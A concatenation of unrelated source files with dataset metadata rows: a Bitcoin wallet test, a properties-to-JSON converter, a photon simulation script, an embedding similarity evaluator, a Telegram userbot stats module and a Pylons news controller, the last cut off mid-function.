#check if JSON parser can handle scientific notation in strings
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "10000e-4")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-1'))
try:
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1f-4")
except JSONRPCException as e:
assert("Invalid amount" in e.error['message'])
else:
raise AssertionError("Must not parse invalid amounts")
try:
self.nodes[0].generate("2")
raise AssertionError("Must not accept strings as numeric")
except JSONRPCException as e:
assert("not an integer" in e.error['message'])
# Import address and private key to check correct behavior of spendable unspents
# 1. Send some coins to generate new UTXO
address_to_import = self.nodes[2].getnewaddress()
txid = self.nodes[0].sendtoaddress(address_to_import, 1)
self.nodes[0].generate(1)
self.sync_all()
# 2. Import address from node2 to node1
self.nodes[1].importaddress(address_to_import)
# 3. Validate that the imported address is watch-only on node1
assert(self.nodes[1].validateaddress(address_to_import)["iswatchonly"])
# 4. Check that the unspents after import are not spendable
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": False})
# 5. Import private key of the previously imported address on node1
priv_key = self.nodes[2].dumpprivkey(address_to_import)
self.nodes[1].importprivkey(priv_key)
# 6. Check that the unspents are now spendable on node1
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": True})
# Mine a block from node0 to an address from node1
cbAddr = self.nodes[1].getnewaddress()
blkHash = self.nodes[0].generatetoaddress(1, cbAddr)[0]
cbTxId = self.nodes[0].getblock(blkHash)['tx'][0]
self.sync_all()
# Check that the txid and balance is found by node1
self.nodes[1].gettransaction(cbTxId)
# check if wallet or blockchain maintenance changes the balance
self.sync_all()
blocks = self.nodes[0].generate(2)
self.sync_all()
balance_nodes = [self.nodes[i].getbalance() for i in range(3)]
block_count = self.nodes[0].getblockcount()
# Check modes:
# - True: unicode escaped as \u....
# - False: unicode directly as UTF-8
for mode in [True, False]:
self.nodes[0].ensure_ascii = mode
# unicode check: Basic Multilingual Plane, Supplementary Plane respectively
for s in [u'рыба', u'𝅘𝅥𝅯']:
addr = self.nodes[0].getaccountaddress(s)
label = self.nodes[0].getaccount(addr)
assert_equal(label, s)
assert(s in self.nodes[0].listaccounts().keys())
self.nodes[0].ensure_ascii = True # restore to default
# maintenance tests
maintenance = [
'-rescan',
'-reindex',
'-zapwallettxes=1',
'-zapwallettxes=2',
# disabled until issue is fixed: https://github.com/bitcoin/bitcoin/issues/7463
# '-salvagewallet',
]
chainlimit = 6
for m in maintenance:
print("check " + m)
stop_nodes(self.nodes)
# set lower ancestor limit for later
self.nodes = start_nodes(3, self.options.tmpdir, [[m, "-limitancestorcount="+str(chainlimit)]] * 3)
while m == '-reindex' and [block_count] * 3 != [self.nodes[i].getblockcount() for i in range(3)]:
# reindex will leave rpc warm up "early"; Wait for it to finish
time.sleep(0.1)
assert_equal(balance_nodes, [self.nodes[i].getbalance() for i in range(3)])
# Exercise listsinceblock with the last two blocks
coinbase_tx_1 = self.nodes[0].listsinceblock(blocks[0])
assert_equal(coinbase_tx_1["lastblock"], blocks[1])
assert_equal(len(coinbase_tx_1["transactions"]), 1)
assert_equal(coinbase_tx_1["transactions"][0]["blockhash"], blocks[1])
assert_equal(len(self.nodes[0].listsinceblock(blocks[1])["transactions"]), 0)
# ==Check that wallet prefers to use coins that don't exceed mempool limits =====
# Get all non-zero utxos together
chain_addrs = [self.nodes[0].getnewaddress(), self.nodes[0].getnewaddress()]
singletxid = self.nodes[0].sendtoaddress(chain_addrs[0], self.nodes[0].getbalance(), "", "", True)
self.nodes[0].generate(1)
node0_balance = self.nodes[0].getbalance()
# Split into two chains
rawtx = self.nodes[0].createrawtransaction([{"txid":singletxid, "vout":0}], {chain_addrs[0]:node0_balance/2-Decimal('0.01'), chain_addrs[1]:node0_balance/2-Decimal('0.01')})
signedtx = self.nodes[0].signrawtransaction(rawtx)
singletxid = self.nodes[0].sendrawtransaction(signedtx["hex"])
self.nodes[0].generate(1)
# Make a long chain of unconfirmed payments without hitting mempool limit
# Each tx we make leaves only one output of change on a chain 1 longer
# Since the amount to send is always much less than the outputs, we only ever need one output
# So we should be able to generate exactly chainlimit txs for each original output
sending_addr = self.nodes[1].getnewaddress()
txid_list = []
for i in range(chainlimit*2):
txid_list.append(self.nodes[0].sendtoaddress(sending_addr, Decimal('1')))
assert_equal(self.nodes[0].getmempoolinfo()['size'], chainlimit*2)
assert_equal(len(txid_list), chainlimit*2)
# Without walletrejectlongchains, we will still generate a txid
# The tx will be stored in the wallet but not accepted to the mempool
extra_txid = self.nodes[0].sendtoaddress(sending_addr, Decimal('1'))
assert(extra_txid not in self.nodes[0].getrawmempool())
assert(extra_txid in [tx["txid"] for tx in self.nodes[0].listtransactions()])
self.nodes[0].abandontransaction(extra_txid)
total_txs = len(self.nodes[0].listtransactions("*",99999))
# Try with walletrejectlongchains
# Double chain limit but require combining inputs, so we pass SelectCoinsMinConf
stop_node(self.nodes[0],0)
self.nodes[0] = start_node(0, self.options.tmpdir, ["-walletrejectlongchains", "-limitancestorcount="+str(2*chainlimit)])
# wait for loadmempool
timeout = 10
while (timeout > 0 and len(self.nodes[0].getrawmempool()) < chainlimit*2):
time.sleep(0.5)
timeout -= 0.5
assert_equal(len(self.nodes[0].getrawmempool()), chainlimit*2)
node0_balance = self.nodes[0].getbalance()
# With walletrejectlongchains we will not create the tx and store it in our wallet.
assert_raises_message(JSONRPCException, "mempool chain", self.nodes[0].sendtoaddress, sending_addr, node0_balance - Decimal('1'))
# Verify nothing new in wallet
assert_equal(total_txs, len(self.nodes[0].listtransactions("*",99999)))
if __name__ == '__main__':
WalletTest().main()
| 46.044444 | 181 | 0.643018 |
4a1e638e35ad1773516ea44bd40d7edc98cee85f | 2,509 | py | Python | src/javaproperties_cli/tojson.py | jwodder/javaproperties-cli | e1bbe04bbb961bf0832a591bdb8edc6f240cc950 | [
"MIT"
] | 4 | 2017-04-27T02:11:05.000Z | 2021-12-14T14:53:30.000Z | src/javaproperties_cli/tojson.py | jwodder/javaproperties-cli | e1bbe04bbb961bf0832a591bdb8edc6f240cc950 | [
"MIT"
] | null | null | null | src/javaproperties_cli/tojson.py | jwodder/javaproperties-cli | e1bbe04bbb961bf0832a591bdb8edc6f240cc950 | [
"MIT"
] | 2 | 2017-06-11T02:13:53.000Z | 2019-02-07T22:15:54.000Z | """
.. program:: properties2json
:program:`properties2json`
--------------------------
NAME
^^^^
:program:`properties2json` — Convert a Java ``.properties`` file to JSON
SYNOPSIS
^^^^^^^^
.. code-block:: shell
properties2json [<OPTIONS>] [<infile> [<outfile>]]
DESCRIPTION
^^^^^^^^^^^
Convert a ``.properties`` file ``infile`` to a JSON object and write the
results to ``outfile``. If not specified, ``infile`` and ``outfile`` default
to standard input and standard output, respectively. The output is encoded in
UTF-8.
.. versionchanged:: 0.6.0
Output encoding is now always UTF-8 instead of being determined by the
locale.
.. versionchanged:: 0.7.0
Key ordering is now preserved by default instead of always being sorted
OPTIONS
^^^^^^^
.. option:: -A, --ascii
.. versionadded:: 0.6.0
Escape all non-ASCII characters in the output with ``\\uXXXX`` escape
sequences. This overrides :option:`--unicode`. This is the default
behavior.
.. option:: -E <encoding>, --encoding <encoding>
Specifies the encoding of the input file; default value: ``iso-8859-1``
(a.k.a. Latin-1)
.. option:: -S, --sort-keys
.. versionadded:: 0.7.0
Sort entries in output by key
.. option:: -U, --unicode
.. versionadded:: 0.6.0
Output non-ASCII characters literally. This overrides :option:`--ascii`.
"""
from collections import OrderedDict
import json
import click
from javaproperties import load
from .util import command, encoding_option, infile_type, outfile_type
@command()
@click.option(
"-A/-U",
"--ascii/--unicode",
"ensure_ascii",
default=True,
help="Whether to escape non-ASCII characters or output raw",
)
@encoding_option
@click.option("-S", "--sort-keys", is_flag=True, help="Sort entries in output by key")
@click.argument("infile", type=infile_type, default="-")
@click.argument("outfile", type=outfile_type, default="-")
def properties2json(infile, outfile, encoding, ensure_ascii, sort_keys):
"""Convert a Java .properties file to JSON"""
with click.open_file(infile, encoding=encoding) as fp:
props = load(fp, object_pairs_hook=OrderedDict)
with click.open_file(outfile, "w", encoding="utf-8") as fp:
json.dump(
props,
fp,
sort_keys=sort_keys,
indent=4,
separators=(",", ": "),
ensure_ascii=ensure_ascii,
)
fp.write("\n")
if __name__ == "__main__":
properties2json() # pragma: no cover
| 25.09 | 86 | 0.648466 |
4a1e647e258314f5f330905773490873897de808 | 3,979 | py | Python | uboone/run_uboone.py | NuTufts/chroma_lartpc | ea6d1a62d22eeeaac069efdef1068a56be683fcc | [
"BSD-3-Clause"
] | null | null | null | uboone/run_uboone.py | NuTufts/chroma_lartpc | ea6d1a62d22eeeaac069efdef1068a56be683fcc | [
"BSD-3-Clause"
] | null | null | null | uboone/run_uboone.py | NuTufts/chroma_lartpc | ea6d1a62d22eeeaac069efdef1068a56be683fcc | [
"BSD-3-Clause"
] | null | null | null | import os,sys,time
#os.environ['PYOPENCL_CTX']='0:0'
#os.environ['PYOPENCL_COMPILER_OUTPUT'] = '0'
#os.environ['CUDA_PROFILE'] = '1'
import chroma.api as api
#api.use_opencl()
api.use_cuda()
import numpy as np
try:
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph as pg
import pyqtgraph.opengl as gl
from chroma.display.pyqtdisplay import PyQtDisplay
except:
pass
from chroma.sim import Simulation
from chroma.event import Photons
from chroma.gpu.photon_fromstep import GPUPhotonFromSteps
import chroma.event
# LOAD CHROMA UBOONE
nthreads_per_block = 64
DISPLAY = False
from uboone import uboone
def gen_stepdata_photons( context ):
steps = np.load( 'steps.npy' )
photons = GPUPhotonFromSteps( steps, cl_context=context )
return photons
def gen_photons( nphotons ):
dphi = np.random.uniform(0,2.0*np.pi, nphotons)
dcos = np.random.uniform(-1.0, 1.0, nphotons)
dir = np.array( zip( np.sqrt(1-dcos[:]*dcos[:])*np.cos(dphi[:]), np.sqrt(1-dcos[:]*dcos[:])*np.sin(dphi[:]), dcos[:] ), dtype=np.float32 )
pos = np.tile([0,0,0], (nphotons,1)).astype(np.float32)
pol = np.zeros_like(pos)
phi = np.random.uniform(0, 2*np.pi, nphotons).astype(np.float32)
pol[:,0] = np.cos(phi)
pol[:,1] = np.sin(phi)
pol = np.cross( pol, dir )
for n,p in enumerate(pol):
norm = np.sqrt( p[0]*p[0] + p[1]*p[1] + p[2]*p[2] )
p /= norm
t = np.zeros(nphotons, dtype=np.float32) + 100.0 # Avoid negative photon times
wavelengths = np.empty(nphotons, np.float32)
wavelengths.fill(128.0)
return Photons(pos=pos, dir=dir, pol=pol, t=t, wavelengths=wavelengths)
if __name__ == "__main__":
try:
if DISPLAY:
app = QtGui.QApplication([])
except:
pass
start = time.time()
det = uboone()
print "[ TIME ] Load detector data ",time.time()-start,"secs"
try:
if DISPLAY:
display = PyQtDisplay( det )
except:
pass
print "[ Start Sim. ]"
start = time.time()
sim = Simulation(det, geant4_processes=0, nthreads_per_block=nthreads_per_block, max_blocks=1024)
print "[ TIME ] push geometry data to GPU: ",time.time()-start,"secs"
nphotons = 1000000
start = time.time()
#photons = gen_photons( nphotons )
photons = gen_stepdata_photons( sim.context ).get()
print "[ TIME ] generate photons ",time.time()-start,"secs"
start = time.time()
events = sim.simulate( photons, keep_photons_end=True, max_steps=2000)
print "[ TIME ] propagate photons ",time.time()-start,"secs"
for ev in events:
nhits = ev.channels.hit[ np.arange(0,36)[:] ]
print "Channels with Hits: "
print nhits
print "Photoelectrons in each channel: "
print ev.channels.q
detected_photons = ev.photons_end.flags[:] & chroma.event.SURFACE_DETECT # bit-wise AND. if detected bit set, then value >0, otherwise 0.
print "Detected photons: ",np.count_nonzero( detected_photons )," frac: ",np.count_nonzero( detected_photons )/len(photons.pos)
print "hit prep: ",len( ev.photons_end.last_hit_triangles ),len(det.solid_id_to_channel_index),len(det.solid_id)
ev.photons_end.dump_history()
channelhit = np.zeros( len(detected_photons), dtype=np.int )
channelhit[:] = det.solid_id_to_channel_index[ det.solid_id[ ev.photons_end.last_hit_triangles[:] ] ]
#for n,f in enumerate(detected_photons):
# if f!=0:
# # by convention chroma starts event at t=100.0
# print "HIT DETID=",channelhit[n]," POS=",ev.photons_end.pos[n,:]," TIME=",ev.photons_end.t[n]-100.0
try:
if DISPLAY:
display.plotEvent( ev )
except:
pass
try:
if DISPLAY:
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
except:
pass
| 33.720339 | 147 | 0.636341 |
4a1e64e42e8bbba554876e2ae0e49f0347fc0328 | 278 | py | Python | desafios/desafio38.py | ravisousag/python2 | 36ec19b40aba543764285caf2de02893a528d4d2 | [
"MIT"
] | null | null | null | desafios/desafio38.py | ravisousag/python2 | 36ec19b40aba543764285caf2de02893a528d4d2 | [
"MIT"
] | null | null | null | desafios/desafio38.py | ravisousag/python2 | 36ec19b40aba543764285caf2de02893a528d4d2 | [
"MIT"
] | null | null | null | a = int(input('Insira primeiro número: '))
b = int(input('Insira segundo número: '))
if a>b:
print('O número A({}) é maior que o número B({})'.format(a,b))
elif b>a:
print('O número B({}) é maior que o número A({})'.format(b,a))
else:
print('Os números são iguais') | 30.888889 | 66 | 0.611511 |
4a1e6581577d9051981961daae7265c54974a413 | 3,304 | py | Python | Classifier/MSE_COS_accuracy.py | climate-ai/truebranch | 79345260540b250f6a0f99103df98cf45df2caff | [
"MIT"
] | 2 | 2020-06-30T02:56:17.000Z | 2020-11-09T16:32:41.000Z | Classifier/MSE_COS_accuracy.py | climate-ai/truebranch | 79345260540b250f6a0f99103df98cf45df2caff | [
"MIT"
] | 6 | 2021-02-02T22:59:46.000Z | 2022-03-12T00:46:53.000Z | Classifier/MSE_COS_accuracy.py | climate-ai/truebranch | 79345260540b250f6a0f99103df98cf45df2caff | [
"MIT"
] | null | null | null | #import modules
from torchvision import datasets, transforms
import numpy as np
import scipy
from sklearn import metrics
val_transform = transforms.Compose([transforms.Resize(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])
test_dataset = datasets.ImageFolder('/Users/Simona/Fresno_Area/test', transform=val_transform)
test_emb_triplet = np.loadtxt('/Users/Simona/Fresno_Area/test_emb_triplet1')
print('MSE_COS_triplet')
MSE_COS(test_emb_triplet,test_dataset)
test_emb_raw = np.loadtxt('/Users/Simona/Fresno_Area/X_test_raw')
print('MSE_COS_raw')
MSE_COS(test_emb_raw,test_dataset)
test_emb_tile2vec = np.loadtxt('/Users/Simona/Fresno_Area/X_test_tile2vec')
print('MSE_COS_tile2vec')
MSE_COS(test_emb_tile2vec,test_dataset)
test_emb_resnet18 = np.loadtxt('/Users/Simona/Fresno_Area/X_test_resnet18imagenet')
print('MSE_COS_resnet18')
MSE_COS(test_emb_resnet18,test_dataset)
test_emb_resnet50 = np.loadtxt('/Users/Simona/Fresno_Area/X_test_resnet50resisc45')
print('MSE_COS_resnet50')
MSE_COS(test_emb_resnet50 ,test_dataset)
test_emb_pca = np.loadtxt('/Users/Simona/Fresno_Area/X_test_PCA')
print('MSE_COS_pca')
MSE_COS(test_emb_pca,test_dataset)
test_emb_kmeans = np.loadtxt('/Users/Simona/Fresno_Area/X_test_kmeans')
print('MSE_COS_kmeas')
MSE_COS(test_emb_kmeans,test_dataset)
def MSE_COS(test_emb,test_dataset):
MSE_tot = []
labels_tot = []
COS_tot = []
for i in range(0,len(test_emb),2):
MSE_sameloc = []
labels_list = []
COS_sameloc = []
for j in range(0,len(test_emb),2):
#print(i,j+1)
Feature_vec_drone_img = test_emb[i]
Feature_vec_planet_img = test_emb[j+1]
labels = tuple([test_dataset[i][1],test_dataset[j+1][1]])
labels_list.append(labels)
MSE_sameloc.append(metrics.mean_squared_error(Feature_vec_drone_img, Feature_vec_planet_img))
COS_sameloc.append(1 - scipy.spatial.distance.cosine(Feature_vec_planet_img,Feature_vec_drone_img))
MSE_tot.append(MSE_sameloc)
labels_tot.append(labels_list)
COS_tot.append(COS_sameloc)
#MSE
top_5_count_MSE = 0
for i in range(0,len(MSE_tot)):
list1 = np.asarray(MSE_tot[i])
list2 = np.asarray(labels_tot[i])
idx = np.argsort(list1)
list1 = np.array(list1)[idx]
list2 = np.array(list2)[idx]
top_5 = list1[0:5]
top_5_l = list2[0:5]
#print(top_5_l)
for k in range(5):
#print(k)
if top_5_l[k][0] == top_5_l[k][1]:
top_5_count_MSE += 1
print("MSE accuracy",top_5_count_MSE/len(MSE_tot)*100)
#COS
top_5_count_COS = 0
for i in range(len(COS_tot)):
list1 = np.asarray(COS_tot[i])
list2 = np.asarray(labels_tot[i])
idx = np.argsort(list1)
list1 = np.array(list1)[idx]
list2 = np.array(list2)[idx]
list1 = np.flipud(list1)
list2 = np.flipud(list2)
top_5 = list1[0:5]
top_5_l = list2[0:5]
for k in range(5):
if top_5_l[k][0] == top_5_l[k][1]:
top_5_count_COS += 1
print("COS accuracy",top_5_count_COS/len(COS_tot)*100)
| 37.977011 | 113 | 0.665254 |
4a1e662a4706bf0e0ff99f55d0cceb49f507f6cf | 676 | py | Python | 3_advanced/chapter17/solutions/compute_similarity.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | [
"MIT"
] | 4 | 2021-03-01T00:32:45.000Z | 2021-05-21T22:01:52.000Z | 3_advanced/chapter17/solutions/compute_similarity.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | [
"MIT"
] | 29 | 2020-09-12T22:56:04.000Z | 2021-09-25T17:08:42.000Z | 3_advanced/chapter17/solutions/compute_similarity.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | [
"MIT"
] | 7 | 2021-02-25T01:50:55.000Z | 2022-02-28T00:00:42.000Z | # Given two sets of integers A and B (each element in these sets are
# between 1 and 1000 inclusive), find the similarity of the two sets
# (the sets are guaranteed to be nonempty). The similarity is a number
# which is computed by dividing the size of the intersection of the
# two sets by their union size.
# Note: the intersection is the # of elements that both sets have in common.
def computeSimilarity(set1, set2):
intersectionSize = 0
for elem in set1:
if elem in set2:
intersectionSize += 1
unionSize = len(set1) + len(set2) - intersectionSize
return intersectionSize / float(unionSize)
print(computeSimilarity({1, 2}, {1, 3}))
| 35.578947 | 76 | 0.713018 |
4a1e680fb36f88a118527f72e6d01b3e3fb11a6f | 9,794 | py | Python | userbot/modules/system_stats.py | huhugh221/ProjectFizilionFork | 9af2d6219b5e4a461f465964f38c3062b38c3a01 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 3 | 2021-08-24T15:48:13.000Z | 2021-09-20T23:20:07.000Z | userbot/modules/system_stats.py | Pewdeadcake/ProjectFizilionFork | 5599e6797781a96df37f302520bb3c5571bd54e0 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/system_stats.py | Pewdeadcake/ProjectFizilionFork | 5599e6797781a96df37f302520bb3c5571bd54e0 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 18 | 2021-07-03T15:12:28.000Z | 2021-08-13T07:27:24.000Z | # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for getting information about the server. """
import platform
import shutil
import sys
import os
import pip
import distro
import time
from asyncio import sleep
from asyncio import create_subprocess_exec as asyncrunapp
from asyncio.subprocess import PIPE as asyncPIPE
from datetime import datetime
from os import remove
from platform import python_version, uname
from shutil import which
import psutil
from git import Repo
from telethon import __version__, version
from userbot import ALIVE_LOGO, ALIVE_MESSAGE, ALIVE_NAME, CMD_HELP, TIMEOUT, USERBOT_VERSION, StartTime, bot, trgg
from userbot.events import register
# ================= CONSTANT =================
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else uname().node
repo = Repo()
modules = CMD_HELP
# ============================================
async def get_readable_time(seconds: int) -> str:
count = 0
up_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
if count < 3:
remainder, result = divmod(seconds, 60)
else:
remainder, result = divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
up_time += time_list.pop() + ", "
time_list.reverse()
up_time += ":".join(time_list)
return up_time
@register(outgoing=True, pattern="^\{trg}spc".format(trg=trgg))
async def psu(event):
uname = platform.uname()
softw = "**System Information**\n"
softw += f"`System : {uname.system}`\n"
softw += f"`Release : {uname.release}`\n"
softw += f"`Version : {uname.version}`\n"
softw += f"`Machine : {uname.machine}`\n"
# Boot Time
boot_time_timestamp = psutil.boot_time()
bt = datetime.fromtimestamp(boot_time_timestamp)
softw += f"`Boot Time: {bt.day}/{bt.month}/{bt.year} {bt.hour}:{bt.minute}:{bt.second}`\n"
# CPU Cores
cpuu = "**CPU Info**\n"
cpuu += "`Physical cores : " + str(psutil.cpu_count(logical=False)) + "`\n"
cpuu += "`Total cores : " + str(psutil.cpu_count(logical=True)) + "`\n"
# CPU frequencies
cpufreq = psutil.cpu_freq()
cpuu += f"`Max Frequency : {cpufreq.max:.2f}Mhz`\n"
cpuu += f"`Min Frequency : {cpufreq.min:.2f}Mhz`\n"
cpuu += f"`Current Frequency: {cpufreq.current:.2f}Mhz`\n\n"
# CPU usage
cpuu += "**CPU Usage Per Core**\n"
for i, percentage in enumerate(psutil.cpu_percent(percpu=True)):
cpuu += f"`Core {i} : {percentage}%`\n"
cpuu += "\n**Total CPU Usage**\n"
cpuu += f"`All Core: {psutil.cpu_percent()}%`\n"
# RAM Usage
svmem = psutil.virtual_memory()
memm = "**Memory Usage**\n"
memm += f"`Total : {get_size(svmem.total)}`\n"
memm += f"`Available : {get_size(svmem.available)}`\n"
memm += f"`Used : {get_size(svmem.used)} ({svmem.percent}%)`\n"
# Disk Usage
dtotal, dused, dfree = shutil.disk_usage(".")
disk = "**Disk Usage**\n"
disk += f"`Total : {get_size(dtotal)}`\n"
disk += f"`Free : {get_size(dfree)}`\n"
disk += f"`Used : {get_size(dused)}`\n"
# Bandwidth Usage
bw = "**Bandwith Usage**\n"
bw += f"`Upload : {get_size(psutil.net_io_counters().bytes_sent)}`\n"
bw += f"`Download: {get_size(psutil.net_io_counters().bytes_recv)}`\n"
help_string = f"{str(softw)}\n"
help_string += f"{str(cpuu)}\n"
help_string += f"{str(memm)}\n"
help_string += f"{str(disk)}\n"
help_string += f"{str(bw)}\n"
help_string += "**Engine Info**\n"
help_string += f"`Python {sys.version}`\n"
help_string += f"`Telethon {__version__}`"
await event.edit(help_string)
def get_size(bytes, suffix="B"):
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
@register(outgoing=True, pattern="^\{trg}sysd$".format(trg=trgg))
async def sysdetails(sysd):
""" For .sysd command, get system info using neofetch. """
if not sysd.text[0].isalpha() and sysd.text[0] not in ("/", "#", "@", "!"):
try:
fetch = await asyncrunapp(
"neofetch",
"--stdout",
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await fetch.communicate()
result = str(stdout.decode().strip()) + str(stderr.decode().strip())
await sysd.edit("`" + result + "`")
except FileNotFoundError:
await sysd.edit("`Install neofetch first !!`")
@register(outgoing=True, pattern="^\{trg}botver$".format(trg=trgg))
async def bot_ver(event):
""" For .botver command, get the bot version. """
if not event.text[0].isalpha() and event.text[0] not in ("/", "#", "@", "!"):
if which("git") is not None:
ver = await asyncrunapp(
"git",
"describe",
"--all",
"--long",
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await ver.communicate()
verout = str(stdout.decode().strip()) + str(stderr.decode().strip())
rev = await asyncrunapp(
"git",
"rev-list",
"--all",
"--count",
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await rev.communicate()
revout = str(stdout.decode().strip()) + str(stderr.decode().strip())
await event.edit(
"`Userbot Version: " f"{verout}" "` \n" "`Revision: " f"{revout}" "`"
)
else:
await event.edit(
"Shame that you don't have git, you're running - 'v2.5' anyway!"
)
@register(outgoing=True, pattern=r"^\{trg}(alive|on)$".format(trg=trgg))
async def amireallyalive(alive):
""" For .alive command, check if the bot is running. """
uptime = await get_readable_time((time.time() - StartTime))
DEFAULT_MESSAGE = (
f"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
f"**Fizilion** is up [--Premium]\n"
f">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n"
f"• `Owner : {DEFAULTUSER} `\n"
f"• `Loaded modules : {len(modules)} `\n"
f"• `Branch : {repo.active_branch.name} `\n"
f"• `Bot Version : {USERBOT_VERSION} `\n"
f"• `Bot Uptime : {uptime} `\n\n"
f"Use `.help` for more info\n"
)
output = ALIVE_MESSAGE or DEFAULT_MESSAGE
if ALIVE_LOGO:
try:
logo = ALIVE_LOGO
msg = await bot.send_file(alive.chat_id, logo, caption=output, del_in=10)
await alive.delete()
await sleep(30)
except BaseException:
await alive.edit(
output + "\n\n *`The provided logo is invalid."
"\nMake sure the link is directed to the logo picture`"
)
else:
msg=await alive.edit(output)
await sleep(30)
if TIMEOUT:
await msg.delete()
@register(outgoing=True, pattern="^\{trg}aliveu".format(trg=trgg))
async def amireallyaliveuser(username):
""" For .aliveu command, change the username in the .alive command. """
message = username.text
output = ".aliveu [new user without brackets] nor can it be empty"
if not (message == ".aliveu" or message[7:8] != " "):
newuser = message[8:]
global DEFAULTUSER
DEFAULTUSER = newuser
output = "Successfully changed user to " + newuser + "!"
await username.edit("`" f"{output}" "`")
@register(outgoing=True, pattern="^\{trg}resetalive$".format(trg=trgg))
async def amireallyalivereset(ureset):
""" For .resetalive command, reset the username in the .alive command. """
global DEFAULTUSER
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else uname().node
await ureset.edit("`" "Successfully reset user for alive!" "`")
@register(outgoing=True, pattern="^\{trg}changelog$".format(trg=trgg))
async def chnglogg(event):
await event.edit(
"In the latest update, these are the changes:\
\n\nAdded silent old kang\
\nuse it by replying to a sticker and sending .ok\
\n\nAdded afk by bot, to setup u need to make a group and add bots to it then add its id as AFK_CHATID.\nTo go afk by bots send .afk-b. it takes a reason too like the normal afk and removes afk when u send any message.\
\n\nAdded purge from and to but its not complete yet so not recommended to use.\
\n\nThis changelog is valid for the last update to forkzilion (ProjectFizilion fork by AbOuLfOoOoOuF) only.")
CMD_HELP.update(
{
"sysd": ".sysd\
\nUsage: Shows system information using neofetch.\
\n\n.spc\
\nUsage: Show system specification."
}
)
CMD_HELP.update(
{
"botver": ".botver\
\nUsage: Shows the userbot version."
}
)
CMD_HELP.update(
{
"alive": ".alive | .on\
\nUsage: Type .alive/.on to see wether your bot is working or not.\
\n\n.aliveu <text>\
\nUsage: Changes the 'user' in alive to the text you want.\
\n\n.resetalive\
\nUsage: Resets the user to default."
}
)
CMD_HELP.update(
{
"changelog": ".changelog\
\nUsage: Check the last changes done to the userbot"
}
)
| 35.357401 | 227 | 0.579743 |
4a1e69ae6e725f280320173c69ef8334b2385a95 | 4,272 | py | Python | ferrox/controllers/news.py | hsuaz/ferrox | ac89b698e6c12c57c7a3128b6a25a3dc100bfc15 | [
"MIT"
] | 3 | 2017-01-03T20:55:16.000Z | 2022-03-01T15:21:53.000Z | ferrox/controllers/news.py | hsuaz/ferrox | ac89b698e6c12c57c7a3128b6a25a3dc100bfc15 | [
"MIT"
] | null | null | null | ferrox/controllers/news.py | hsuaz/ferrox | ac89b698e6c12c57c7a3128b6a25a3dc100bfc15 | [
"MIT"
] | 4 | 2017-01-03T20:48:09.000Z | 2022-03-01T15:21:58.000Z | from ferrox.lib.base import *
from ferrox.lib.formgen import FormGenerator
from ferrox.model import form
import formencode
import logging
import sqlalchemy
log = logging.getLogger(__name__)
class NewsController(BaseController):
def index(self):
"""Paged list of all news."""
page_link_var = 'p'
page = request.params.get(page_link_var, 0)
c.newsitems = model.Session.query(model.News) \
.order_by(model.News.time.desc())
return render('news/index.mako')
def view(self, id):
page_link_var = 'p'
page = request.params.get(page_link_var, 0)
c.news = model.Session.query(model.News).get(id)
if not c.news:
abort(404)
return render('news/view.mako')
@check_perm('news.manage')
def post(self):
"""Form for posting news."""
c.form = FormGenerator()
return render('news/post.mako')
@check_perm('news.manage')
def do_post(self):
"""Form handler for posting news."""
c.form = FormGenerator()
schema = model.form.NewsForm()
try:
form_data = schema.to_python(request.params)
except formencode.Invalid, error:
c.form.defaults = error.value
c.form.errors = error.error_dict
return render('news/post.mako')
title = h.html_escape(form_data['title'])
content = form_data['content']
news = model.News(title=title, content=content, user=c.auth_user)
news.is_anonymous = form_data['is_anonymous']
if form_data['avatar_id']:
av = model.Session.query(model.UserAvatar).filter_by(id = form_data['avatar_id']).filter_by(user_id = c.auth_user.id).one()
news.avatar = av
model.Session.add(news)
model.Session.commit()
h.redirect_to('/news')
@check_perm('news.manage')
def edit(self):
"""Form for editing news."""
c.form = FormGenerator()
c.item = model.Session.query(model.News).get(c.id)
c.form.defaults = h.to_dict(c.item)
return render('news/edit.mako')
@check_perm('news.manage')
def edit_commit(self, id):
"""Form handler for editing news."""
c.item = model.Session.query(model.News).get(id)
schema = model.form.NewsForm()
try:
form_data = schema.to_python(request.params)
except formencode.Invalid, error:
c.form = FormGenerator(form_error=error)
return render('news/edit.mako')
title = h.html_escape(form_data['title'])
#content = h.html_escape(form_data['content'])
content = form_data['content']
if c.item.title != title or c.item.content != content:
if c.item.editlog == None:
c.item.editlog = model.EditLog(c.auth_user)
editlog_entry = model.EditLogEntry(c.auth_user, 'no reasons yet',
c.item.title, c.item.content,
c.item.content_parsed)
